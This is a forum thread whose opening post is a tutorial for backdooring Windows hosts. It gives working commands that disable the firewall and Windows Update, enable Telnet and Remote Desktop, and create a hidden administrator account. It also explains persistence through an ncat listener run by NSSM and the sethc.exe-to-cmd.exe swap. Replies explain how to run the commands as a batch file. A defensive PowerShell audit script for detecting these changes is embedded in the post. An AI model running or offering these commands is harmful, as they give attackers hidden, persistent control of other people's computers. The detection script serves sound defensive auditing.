Windows Remote Desktop Backdoor

Discussion in 'Network' started by Asphyxia, Oct 18, 2016.

  1. Asphyxia

    Asphyxia Web Admin Administrator Moderator

    Non-Sucking Service Manager //
    NCAT //

    I wrote a private tutorial on this a while ago and now I'm just going to publish it because no one else had something written as to-the-point and helpful as what I had written.

    1. Run all of this shit:
    sc config wuauserv start= disabled
    net stop wuauserv
    netsh firewall set opmode disable
    sc config tlntsvr start= auto
    net start telnet
    reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
    net user support1 passwordA!1 /add
    net localgroup "Administrators" /add support1
    net localgroup "Users" /del support1
    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v support1 /t REG_DWORD /d 0 /f
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system /v dontdisplaylastusername /t REG_DWORD /d 1 /f
    net user support1 passwordA!1 /add --- this line creates the user with the username of support1.
    I grabbed this from:

    2. Make sure the Terminal Service is running because the Terminal Server is what Remote Desktop runs as. Do this stuff:

    3. Go ahead and try it, if it doesn't work try to reboot/restart the server and it should work or at least try stopping and starting the termservice.

    Is the location of the Remote Desktop port, if you find a program that is running on port 8080 or even port 80 and switch over the Remote Desktop port to 80/8080... this bypasses the need to port forward and since by default you can't back-connect or reverse-connect using remote desktop, this makes sense.

    Lastly, use the NSSM to make ncat listen as a system service each time the computer starts up. This makes maintaining access very easy.

    Alternatively you may be interested in enabling the Remote Desktop service, change sethc.exe inside the Windows System files to sethcbk.exe and copy cmd.exe to sethc.exe -- you will now connect to remote desktop and so long as authentication before screen view isn't enabled, you will see an ACTUAL screen with a login box. Tap shift 5 times and enjoy having a cmd window open with system level access. A simple and silly Windows fail.
    Last edited: Oct 18, 2016
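    For anyone auditing a box rather than building one: the post above changes a handful of well-known host settings (RDP enabled and possibly moved to another port, a hidden local admin account, the update service off, Telnet on, the firewall off, an NSSM-wrapped ncat service, and sethc.exe swapped for cmd.exe). The PowerShell script below is an added example, not from this thread or any project it mentions; it reads those same locations and reports anything that matches. It assumes PowerShell 5.1 or later running as an administrator on the host being checked; the registry paths are the standard Windows ones, and the function names are my own.

```powershell
# Added audit script (not from the thread): reports host changes matching the
# tutorial above so a defender can spot them. Assumes PowerShell 5.1+, run as
# administrator on the host being checked. Registry paths are standard Windows
# locations; function names are this example's own.

function Get-RegValue {
    param([string]$Path, [string]$Name)
    $item = Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return $item.$Name
}

function Get-BackdoorFindings {
    $findings = New-Object System.Collections.Generic.List[string]

    # 1. Remote Desktop enabled (fDenyTSConnections = 0), and RDP moved off 3389
    $ts = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
    if ((Get-RegValue $ts 'fDenyTSConnections') -eq 0) {
        $findings.Add('Remote Desktop connections are enabled (fDenyTSConnections = 0)')
    }
    $port = Get-RegValue "$ts\WinStations\RDP-Tcp" 'PortNumber'
    if ($port -and $port -ne 3389) {
        $findings.Add("RDP-Tcp PortNumber is $port, not the default 3389")
    }

    # 2. Accounts hidden from the logon screen (UserList value 0) and last-user hiding
    $ul = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList'
    if (Test-Path $ul) {
        foreach ($p in (Get-ItemProperty -Path $ul).PSObject.Properties) {
            # PS* properties are provider metadata, not account names
            if ($p.Name -notlike 'PS*' -and $p.Value -eq 0) {
                $findings.Add("Account '$($p.Name)' is hidden from the logon screen")
            }
        }
    }
    $pol = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    if ((Get-RegValue $pol 'dontdisplaylastusername') -eq 1) {
        $findings.Add('Last logged-on user name is hidden (dontdisplaylastusername = 1)')
    }

    # 3. Service start modes: Windows Update disabled, Telnet set to auto-start
    $wu = Get-CimInstance Win32_Service -Filter "Name='wuauserv'"
    if ($wu -and $wu.StartMode -eq 'Disabled') { $findings.Add('Windows Update (wuauserv) is disabled') }
    $tln = Get-CimInstance Win32_Service -Filter "Name='tlntsvr'"
    if ($tln -and $tln.StartMode -eq 'Auto') { $findings.Add('Telnet (tlntsvr) is set to auto-start') }

    # 4. Firewall profiles turned off (cmdlet exists on Windows 8 / Server 2012 and later)
    if (Get-Command Get-NetFirewallProfile -ErrorAction SilentlyContinue) {
        Get-NetFirewallProfile | Where-Object { -not $_.Enabled } | ForEach-Object {
            $findings.Add("Firewall profile '$($_.Name)' is disabled")
        }
    }

    # 5. Services whose binary path references nssm or ncat (the persistence the post recommends)
    Get-CimInstance Win32_Service | Where-Object { $_.PathName -match 'nssm|ncat' } | ForEach-Object {
        $findings.Add("Service '$($_.Name)' runs '$($_.PathName)'")
    }

    # 6. sethc.exe replaced by a copy of cmd.exe: same hash, or wrong OriginalFilename
    $sys32 = Join-Path $env:SystemRoot 'System32'
    $sethc = Join-Path $sys32 'sethc.exe'
    $cmd   = Join-Path $sys32 'cmd.exe'
    if ((Test-Path $sethc) -and (Test-Path $cmd)) {
        $sameHash = (Get-FileHash $sethc).Hash -eq (Get-FileHash $cmd).Hash
        $orig = (Get-Item $sethc).VersionInfo.OriginalFilename
        if ($sameHash -or ($orig -and $orig -notlike 'sethc*')) {
            $findings.Add("sethc.exe looks replaced (OriginalFilename='$orig', same hash as cmd.exe: $sameHash)")
        }
    }
    if (Test-Path (Join-Path $sys32 'sethcbk.exe')) {
        $findings.Add('sethcbk.exe exists in System32 (the renamed original from the post)')
    }

    return $findings
}

$results = Get-BackdoorFindings
if ($results.Count -eq 0) { 'No indicators found.' } else { $results | ForEach-Object { "[!] $_" } }
```

    Each check is independent, so a hit on any one line is worth a look even when the others are clean; the sethc.exe check in particular compares file hashes rather than trusting the file name, which is what catches a straight copy of cmd.exe.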
  2. Ch4ch4rR4t0

    Ch4ch4rR4t0 Member

    How do I execute the commands from step 1? In cmd? '-'
  3. naturenmoon

    naturenmoon New Member

    You can run these codes with "a bat file" (you can create a bat file easily) and then copy these codes and paste them into the ".bat file" and RUN IT ;)
    That's all
